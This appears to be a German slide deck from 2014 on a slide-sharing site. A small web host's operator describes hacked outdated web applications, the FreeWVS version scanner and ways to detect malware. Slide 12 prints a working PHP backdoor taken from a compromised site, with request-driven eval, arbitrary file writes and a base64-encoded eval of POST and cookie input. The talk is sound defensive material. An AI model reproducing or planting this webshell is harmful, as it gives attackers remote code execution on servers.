gehackte webapplikationen und malware
play

Gehackte Webapplikationen und Malware Hanno B ock, Lizenz: CC0 / - PowerPoint PPT Presentation

Apr 03, 2023 •132 likes •313 views

Einleitung FreeWVS Gehackt Exkurs Ende Gehackte Webapplikationen und Malware Hanno B ock, Lizenz: CC0 / Public Domain 2014-04-11 Hanno B ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware Einleitung Vorstellung

  1. Einleitung FreeWVS Gehackt Exkurs Ende Gehackte Webapplikationen und Malware Hanno B¨ ock, Lizenz: CC0 / Public Domain 2014-04-11 Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  2. Einleitung Vorstellung FreeWVS Beispiel Gehackt Motivation Exkurs Veraltete Webanwendungen Ende ◮ Betreibe kleinen Webhoster (schokokeks.org), Fokus auf Datenschutz, Sicherheit, freie Software ◮ Zahlen: 2 Admins, ca. 300 Kunden, 1000 Domains, 1500 Web-Vhosts, 500 erkannte Webanwendungen ◮ Serverbetrieb f¨ ur mich Nebenverdienst, hauptberuflich freier Journalist Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  3. Einleitung Vorstellung FreeWVS Beispiel Gehackt Motivation Exkurs Veraltete Webanwendungen Ende Your IP: x.x.x.x - Part of Ababil/”No Problem Bro” DDOS attack We are contacting you on behalf of [...]. They are currently under a DDOS attack, that is being perpetuated from this host on your network: x.x.x.x They have so far seen this much traffic coming from the node: 107576316 bytes 1453734 packets This is part of the Operation Ababil, or ”It’s OK, No Problem Bro”, DDOS attack that is being sent upon various financial institutions in the United States. Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  4. Einleitung Vorstellung FreeWVS Beispiel Gehackt Motivation Exkurs Veraltete Webanwendungen Ende ◮ Gehackte Webanwendungen bedeuten Streß - nicht nur f¨ ur den Betreiber der Seite, sondern insbesondere auch f¨ ur den Admin ◮ Serverlast steigt unerkl¨ arlich ◮ Spam-Blacklisten ◮ ¨ Ubergeordneter Provider beschwert sich und erwartet Reaktion ◮ Strafverfolgungsbeh¨ orden (bei uns noch nie passiert) ◮ Brauchen Strategien f¨ ur ganzen Server, nicht f¨ ur einzelne Webseiten Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  5. Einleitung Vorstellung FreeWVS Beispiel Gehackt Motivation Exkurs Veraltete Webanwendungen Ende ◮ Konkretes Beispiel war ein Joomla 1.7.0, damals ca. 1 Jahr alt ◮ Derartige Vorkommnisse verst¨ arkt seit etwa 2012, davor fast nie ◮ Alle(!) derartigen Ereignisse bei uns mit hoher Wahrscheinlichkeit aufgrund von veralteten Webanwendungen ◮ Fazit: Updaten bevor etwas passiert ist die beste Strategie Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  6. Einleitung FreeWVS FreeWVS Schwierigkeiten beim Erkennen Gehackt User informieren Exkurs Entwicklung von FreeWVS Ende Problem Webseiten heute ◮ FreeWVS erkennt Webanwendungen und Version auf Dateisystemebene ◮ Enth¨ alt eine Datenbank mit jeweils letzter Sicherheitsl¨ ucke (wenn m¨ oglich CVE, sonst URL) und sicherer Version ◮ Unterscheidet nicht nach schwere der Sicherheitsl¨ ucke, betrachtet nur jeweils j¨ ungstes Problem ◮ Python, freie Software (CC0) ◮ https://source.schokokeks.org/freewvs/ Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  7. Einleitung FreeWVS FreeWVS Schwierigkeiten beim Erkennen Gehackt User informieren Exkurs Entwicklung von FreeWVS Ende Problem Webseiten heute ◮ Es gibt keine allgemeing¨ ultige Strategie zum Erkennen von Webapps ◮ Versionsnummer nicht im Tarball, nur in Doku, nur gesplittet ◮ Seltsame Versionsnummernkonzepte (DokuWiki: 2013-12-08, auch schon gesehen: 1.2 neuer als 1.11) ◮ Oft unterschiedliche Erkennungsstrategien f¨ ur unterschiedliche Major-Versionen ◮ Angenehm ist sowas: $wp version = ’3.8.2’; Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  8. Einleitung FreeWVS FreeWVS Schwierigkeiten beim Erkennen Gehackt User informieren Exkurs Entwicklung von FreeWVS Ende Problem Webseiten heute ◮ User k¨ onnen sich wahlweise t¨ aglich, w¨ ochentlich oder monatlich informieren lassen ◮ Nicht abschaltbar! ◮ Problem: Wird h¨ aufig ignoriert ◮ Vielen Usern nicht klar dass Webanwendungen betreut werden m¨ ussen Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  9. Einleitung FreeWVS FreeWVS Schwierigkeiten beim Erkennen Gehackt User informieren Exkurs Entwicklung von FreeWVS Ende Problem Webseiten heute ◮ Bislang fast nur intern entwickelt, wenig Feedback von extern ◮ Update-Mechanismus nicht optimal (im Moment: svn up; make install) ◮ K¨ onnten viel mehr Webanwendungen aufnehmen, insbesondere Plugins ◮ Patches welcome! Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  10. Einleitung FreeWVS FreeWVS Schwierigkeiten beim Erkennen Gehackt User informieren Exkurs Entwicklung von FreeWVS Ende Problem Webseiten heute ◮ Fr¨ uher: Webdesigner erstellt HTML-Seite ◮ Zwischendurch: Webdesigner erstellt PHP ◮ Heute: Webdesigner erstellt Theme f¨ ur einfach zu bedienende, kostenlose Webanwendungen ◮ Problem: Wer k¨ ummert sich um Updates? Oft: Niemand ◮ L¨ osung manchmal: HTML-Dump von CMS Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  11. Einleitung Wenn es zu sp¨ at ist FreeWVS PHP-Shell Gehackt Von Hand erkennen Exkurs Malware erkennen Ende Offene Fragen ◮ Bei uns bislang keine Defacements via SQL-Injection oder geklauten Zugangsdaten beobachtet (wir benutzen schon immer SFTP) ◮ Nur: Spam, DDoS-Attacken und (am h¨ aufigsten) abgelegte PHP-Shells ◮ Oft: Grund f¨ ur Angriff unklar, PHP-Shell ”f¨ ur sp¨ ater” Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  12. Einleitung Wenn es zu sp¨ at ist FreeWVS PHP-Shell Gehackt Von Hand erkennen Exkurs Malware erkennen Ende Offene Fragen $huqcyw = ”777564599393bc96823bdf64b6f221d5”; if(isset($ REQUEST[’epji’])) { $kumwnkyc = $ REQUEST[’epji’]; eval($kumwnkyc); exit(); } if(isset($ REQUEST[’qfwdstnd’])) { $rpjvrsf = $ REQUEST[’wuefsoa’]; $kopi = $ REQUEST[’qfwdstnd’]; $mzwjcpc = fopen($kopi, ’w’); $sshhbcz = fwrite($mzwjcpc, $rpjvrsf); fclose($mzwjcpc); echo $sshhbcz; exit(); eval ( base64 decode (”IGlmICggaXNz- ZXQoICRfQ09PS0lFWydkd2MnXSkgKSB7IGVjaG8gJzxjd2Q+ JyAuIGdldGN3ZCgpIC4gJzwvY3dkPic7IH0gaWYgKCBpc3Nld CAoICRfUE9TVFsncGU4MCddICkgKSB7IGV2YWwgKCBiYXNlNj RfZGVjb2RlICggJF9QT1NUWydwZTgwJ10gKSApOyByZXR1cm4 7IH0gIGlmICggaXNzZXQoICRfQ09PS0lFWydwZTgwJ10pICkg eyBldmFsICggYmFzZTY0X2RlY29kZSAoICRfQ09PS0lFWydwZ TgwJ10gKSApOyByZXR1cm47IH0g”) ); } Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  13. Einleitung Wenn es zu sp¨ at ist FreeWVS PHP-Shell Gehackt Von Hand erkennen Exkurs Malware erkennen Ende Offene Fragen ◮ Kombinationen aus eval, gzinflate, base64 decode und ¨ ahnlichem ◮ Problem: Oft auch sowas in legitimem PHP-Code (oft Themes) als Code-Obfuscation ◮ Decodieren: eval durch echo ersetzen Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  14. Einleitung Wenn es zu sp¨ at ist FreeWVS PHP-Shell Gehackt Von Hand erkennen Exkurs Malware erkennen Ende Offene Fragen ◮ Webroots mit ClamAV scannen - erkennt viel, aber l¨ angst nicht alles ◮ LinuxMalwareDetect (maldet) - etwas umst¨ andlich in der Bedienung, aber erkennt einiges ◮ Auch einige propriet¨ are Virenscanner f¨ ur Linux verf¨ ugbar, kostenlos meist nur zum privatgebrauch ◮ Problem: Erkennungsrate praktisch immer unter 50 % ◮ Erstes Codebeispiel von vorhin: damals 0 auf Virustotal, jetzt 1/51 Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  15. Einleitung Wenn es zu sp¨ at ist FreeWVS PHP-Shell Gehackt Von Hand erkennen Exkurs Malware erkennen Ende Offene Fragen ◮ Strategien zur generischen Erkennung von PHP-Shells? Sollte nicht zu schwer sein, kenne aber keine Software. ◮ Wie / an wen Malware am besten reporten? ◮ Erkennen von Hacks in Form von Datenbankeintr¨ agen / Artikeln / Defacements? Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  16. Einleitung FreeWVS Sichere Webanwendungen Gehackt Exkurs Ende ◮ Wenn ihr Webanwendungen programmiert: Benutzt Prepared Statements und Content Security Policy! ◮ Konsequent eingesetzt verhindern Prepared Statements alle SQL-Injections und Content Security Policy alle Cross Site Scripting-Fehler - Großteil aller Web-Vulnerabilities ◮ Fehlerklassen verhindern statt einzelne Fehler ◮ Aber: H¨ atte in meisten F¨ allen bei uns vermutlich nichts gen¨ utzt (Probleme mit File Upload oder Remote Code Execution) Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

  17. Einleitung FreeWVS Schlussfolgerung Gehackt Exkurs Ende ◮ Ein Großteil der Angriffe l¨ asst sich durch aktuelle Software verhindern ◮ Angriffe verhindern ist immer besser als Angriffe sp¨ ater erkennen ◮ M¨ oglichkeiten angegriffene Webseiten zu finden unzuverl¨ assig und unbefriedigend Hanno B¨ ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Malware What is malware? Malware: malicious software worm ransomware adware

Malware What is malware? Malware: malicious software worm ransomware adware

Malware What is malware? Malware: malicious software worm ransomware adware virus trojan horse etc. and how do we fight it? AV software Firewalls Filtering Patching Writing more secure software

568 views • 22 slides
Malware What is malware? Malware: malicious software worm ransomware adware

Malware What is malware? Malware: malicious software worm ransomware adware

Malware What is malware? Malware: malicious software worm ransomware adware virus trojan horse etc. and how do we fight it? AV software Firewalls Filtering Patching Writing more secure software

540 views • 42 slides
Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the explosive growth of mobile device market and usage, there is an increasing number of malicious mobile applications targeting these devices and

819 views • 44 slides
Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal

Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal

Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal paul@gtisc.gatech.edu Agenda Modern Malware Obfuscations, Server-side Polymorphism, Collection Volume Malware Analysis Detection

504 views • 27 slides
Getting started with malware analysis Judith van Stegeren Definitions Malware : any software that

Getting started with malware analysis Judith van Stegeren Definitions Malware : any software that

Getting started with malware analysis Judith van Stegeren Definitions Malware : any software that does something that causes harm to a user, computer or network, including viruses, trojan horses, worms, rootkits, scareware and spyware. Malware

119 views • 9 slides
GOODWARE DRUGS FOR MALWARE: ON-THE-FLY MALWARE ANALYSIS AND CONTAINMENT DAMIANO BOLZONI

GOODWARE DRUGS FOR MALWARE: ON-THE-FLY MALWARE ANALYSIS AND CONTAINMENT DAMIANO BOLZONI

GOODWARE DRUGS FOR MALWARE: ON-THE-FLY MALWARE ANALYSIS AND CONTAINMENT DAMIANO BOLZONI CHRISTIAAN SCHADE TWENTE SECURITY LAB UNIVERSITY OF TWENTE THE NETHERLANDS AGENDA Something about malware Malware internals Current analysis

398 views • 27 slides
A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND

A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND

A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND CONTAINMENT FOR LARGE NETWORKS CHRISTIAAN SCHADE TWENTE SECURITY LAB UNIVERSITY OF TWENTE THE NETHERLANDS MALWARE WARS In the last

313 views • 14 slides
Malware Halting 1. Malware 2. Software diversity Part I: Method Development 3. Computer

Malware Halting 1. Malware 2. Software diversity Part I: Method Development 3. Computer

Overview Malware Halting 1. Malware 2. Software diversity Part I: Method Development 3. Computer immunization Kjell Jrgen Hole Simula@UiB 4. Epidemiological model 5. Malware halting analysis 6. Malware halting method Last updated

672 views • 29 slides
How does Malware Use RDTSC? A Study on Operations Executed by Malware with CPU Cycle Measurement

How does Malware Use RDTSC? A Study on Operations Executed by Malware with CPU Cycle Measurement

How does Malware Use RDTSC? A Study on Operations Executed by Malware with CPU Cycle Measurement Yoshihiro Oyama University of Tsukuba 1 Background Many malware programs execute operations for analysis evasion Detection of

346 views • 31 slides
Anti-anti-malware (part 3) / Stack Smashing 1 last time various kinds of armored malware

Anti-anti-malware (part 3) / Stack Smashing 1 last time various kinds of armored malware

Anti-anti-malware (part 3) / Stack Smashing 1 last time various kinds of armored malware malware that evades analysis 2 logistics: LEX homework detect push ret pattern using fmex probably easier than TRICKY 3 upcoming exam next Wednesday

496 views • 48 slides
Android Malware Adventures Mert Can Cokuner Krat Ouzhan Aknc Android Malware

Android Malware Adventures Mert Can Cokuner Krat Ouzhan Aknc Android Malware

DeepSec IDSC Android Malware Adventures Mert Can Cokuner Krat Ouzhan Aknc Android Malware Adventures Agenda INTRODUCTION ANDROID MALWARE COMMAND & CONTROL QUESTIONS & ANSWERS 2 1 2 3 4 Android Malware

1.01k views • 64 slides
Malware Defense I TDDD17 Information Security, Second Course Ulf Kargn Department of

Malware Defense I TDDD17 Information Security, Second Course Ulf Kargn Department of

Malware Defense I TDDD17 Information Security, Second Course Ulf Kargn Department of Computer and Information Science Linkping University Malware Defense Agenda 2 Two lectures Lecture I : Malware basics, malware on the PC,

621 views • 40 slides
FIGHTING MALWARE WITH MACHINE LEARNING Edward Raff Jared Sylvester Mark McLean Need ML for

FIGHTING MALWARE WITH MACHINE LEARNING Edward Raff Jared Sylvester Mark McLean Need ML for

FIGHTING MALWARE WITH MACHINE LEARNING Edward Raff Jared Sylvester Mark McLean Need ML for Malware Amount of malware is growing exponentially Anti-virus and signature based approaches are reactionary, dont work for novel malware

127 views • 11 slides
CO 445H MALWARE AND VIRUSES Dr. Benjamin Livshits Malware: Different Types 2 Spyware is

CO 445H MALWARE AND VIRUSES Dr. Benjamin Livshits Malware: Different Types 2 Spyware is

CO 445H MALWARE AND VIRUSES Dr. Benjamin Livshits Malware: Different Types 2 Spyware is software that aids in gathering A virus is a computer program that is information about a person or organization capable of making copies of itself

716 views • 56 slides
CS7038 - Malware Analysis - Wk03.1 Malware Taxonomy and Terminology Coleman Kane

CS7038 - Malware Analysis - Wk03.1 Malware Taxonomy and Terminology Coleman Kane

CS7038 - Malware Analysis - Wk03.1 Malware Taxonomy and Terminology Coleman Kane kaneca@mail.uc.edu January 24, 2017 Why Classification is Important Malware classification helps us in multiple ways. Here are a couple key ways:

787 views • 16 slides
On Static Malware Detection Tayssir Touili LIPN, CNRS & Univ. Paris 13 Motivation: Malware

On Static Malware Detection Tayssir Touili LIPN, CNRS & Univ. Paris 13 Motivation: Malware

On Static Malware Detection Tayssir Touili LIPN, CNRS & Univ. Paris 13 Motivation: Malware Detection The number of new malware exceeds 75 million by the end of 2011, and is still increasing. The number of malware that produced

1.34k views • 91 slides
1 The challenge for this presentation 1. Building an embedded Linux distribution from source is

1 The challenge for this presentation 1. Building an embedded Linux distribution from source is

1 The challenge for this presentation 1. Building an embedded Linux distribution from source is a complex task 2. The Yocto Project is a collection of powerful tools with lots of complexity of their own A word of thanks This presentation is

886 views • 32 slides
Nutrition & Weight Loss: Strategies for Success 979 East 3 rd Street, Suite C-620

Nutrition & Weight Loss: Strategies for Success 979 East 3 rd Street, Suite C-620

Nutrition & Weight Loss: Strategies for Success 979 East 3 rd Street, Suite C-620 Chattanooga, TN 37403 423-778-2906 (office) 423-778-9482 (fax) metabolicsurgery@erlanger.org Table of Contents What is Obesity? 1 Components of Food 2

517 views • 26 slides
Procedimientos, herramientas y estrategias para el desarrollo con drush, make y perfiles de

Procedimientos, herramientas y estrategias para el desarrollo con drush, make y perfiles de

Procedimientos, herramientas y estrategias para el desarrollo con drush, make y perfiles de instalacin Jonathan Araa Cruz jonhattan http://jonhattan.faita.net Procedimientos, herramientas y estrategias para el desarrollo con drush,

531 views • 26 slides
Fraquezas no Cart ao MIFARE Classic Wellington Baltazar de Souza Instituto de Matem atica e

Fraquezas no Cart ao MIFARE Classic Wellington Baltazar de Souza Instituto de Matem atica e

Fraquezas no Cart ao MIFARE Classic Wellington Baltazar de Souza Instituto de Matem atica e Estat stica Laborat orio de Seguran ca de Dados 9 de Agosto de 2010 Wellington Baltazar de Souza Fraquezas no Cart ao MIFARE

345 views • 34 slides
Macrolide resistance and treatment failure E-mail from Prof. Schito, 14-11-01 10:56: for

Macrolide resistance and treatment failure E-mail from Prof. Schito, 14-11-01 10:56: for

Macrolide resistance and treatment failure E-mail from Prof. Schito, 14-11-01 10:56: for me too these days have been impossible, to the point that I have to decline this invi- tation and pass to you all the responsibility. Sorry for

617 views • 9 slides
Probabilistic Reasoning with Bayesian Networks course notes 2019 L.C. van der Gaag, S.

Probabilistic Reasoning with Bayesian Networks course notes 2019 L.C. van der Gaag, S.

Probabilistic Reasoning with Bayesian Networks course notes 2019 L.C. van der Gaag, S. Renooij c UU ICS Master Programmes: Computing Science Artificial Intelligence 1 / 383 Probabilistic reasoning with Bayesian networks Silja Renooij

666 views • 29 slides
Applications of Description Logics IJCAR 2001: Description Logics tutorial p.1/9 Application

Applications of Description Logics IJCAR 2001: Description Logics tutorial p.1/9 Application

Applications of Description Logics IJCAR 2001: Description Logics tutorial p.1/9 Application Areas I IJCAR 2001: Description Logics tutorial p.2/9 Application Areas I Terminological KR and Ontologies IJCAR 2001: Description Logics

766 views • 76 slides
Region-wide enterprise image management Dream or reality? Bart Thielen Helse Vest - Norway

Region-wide enterprise image management Dream or reality? Bart Thielen Helse Vest - Norway

Region-wide enterprise image management Dream or reality? Bart Thielen Helse Vest - Norway Helse Vest DMA The Vision One centralized solution for capturing, archiving and distribution of all medical images, videos, multimedia and clinical

321 views • 21 slides

More recommend